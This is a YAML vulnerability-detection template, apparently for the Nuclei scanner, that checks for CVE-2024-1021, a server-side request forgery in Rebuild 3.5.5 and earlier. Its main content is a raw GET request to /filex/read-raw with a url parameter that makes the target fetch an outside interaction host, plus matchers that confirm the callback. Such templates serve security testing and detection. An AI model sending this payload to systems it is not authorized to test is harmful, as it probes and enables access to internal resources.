37 lines
1.1 KiB
YAML
37 lines
1.1 KiB
YAML
|
id: CVE-2024-1021
|
||
|
|
|
||
|
|
info:
|
||
|
|
name: Rebuild <= 3.5.5 - Server-Side Request Forgery
|
||
|
|
author: BMCel
|
||
|
|
severity: medium
|
||
|
|
description: |
|
||
|
|
There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.
|
||
|
|
impact: |
|
||
|
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
||
|
|
remediation: |
|
||
|
|
Apply the latest security patches or updates provided by Rebuild to fix this vulnerability.
|
||
|
|
reference:
|
||
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-1021
|
||
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-1021
|
||
|
|
- https://github.com/getrebuild/rebuild
|
||
|
|
metadata:
|
||
|
|
max-request: 1
|
||
|
|
tags: cve2024,cve,rebuild,ssrf
|
||
|
|
|
||
|
|
http:
|
||
|
|
- raw:
|
||
|
|
- |
|
||
|
|
GET /filex/read-raw?url=http://{{interactsh-url}}&cut=1 HTTP/1.1
|
||
|
|
Host: {{Hostname}}
|
||
|
|
|
||
|
|
matchers-condition: and
|
||
|
|
matchers:
|
||
|
|
- type: word
|
||
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
||
|
|
words:
|
||
|
|
- "http"
|
||
|
|
|
||
|
|
- type: status
|
||
|
|
status:
|
||
|
|
- 200
|